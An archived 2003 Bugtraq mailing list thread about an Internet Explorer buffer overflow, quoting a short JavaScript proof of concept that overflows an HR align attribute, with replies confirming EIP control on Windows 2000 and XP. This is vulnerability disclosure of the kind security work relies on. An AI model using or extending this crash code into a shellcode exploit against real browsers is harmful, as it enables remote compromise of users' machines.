lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
From: bugtraq at securiteam.com (SecurITeam BugTraq Monitoring)
Subject: Re: Internet Explorer >=5.0 : Buffer overflow

Hi,

I can confirm it under Windows 2000 with IE 5.50.4807.2300

Full control over the EIP, but the shellcode cannot contain (as it currently
appears) non Alpha Numeric characters, too bad I guess.

Thanks
Noam Rathaus
CTO
Beyond Security Ltd
http://www.SecurITeam.com
http://www.BeyondSecurity.com
----- Original Message -----
From: "KF" <dotslash@...soft.com>
To: "Digital Scream" <digitalscream@...l.xakep.ru>
Sent: Monday, June 23, 2003 6:43 PM
Subject: Re: Internet Explorer >=5.0 : Buffer overflow


> I can confirm this on Windows XP Professional
>
> version 6.0.2800.1106.xpsp2-030422-1633
>
> 0x43534c41 refrenced mem at 0x43534c41
> -KF
>
>
> Digital Scream wrote:
>
> >&lt;script&gt;
> > wnd=open("about:blank","","");
> > wnd.moveTo(screen.Width,screen.Height);
> > WndDoc=wnd.document;
> > WndDoc.open();
> > WndDoc.clear();
> > buffer="";
> > for(i=1;i<=127;i++)buffer+="X";
> > buffer+="DigitalScream";
> > WndDoc.write("<HR align='"+buffer+"'>");
> > WndDoc.execCommand("SelectAll");
> > WndDoc.execCommand("Copy");
> > wnd.close();
> >&lt;/script&gt;
> >
> >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
> >
> >
> >
>
>
>


Powered by blists - more mailing lists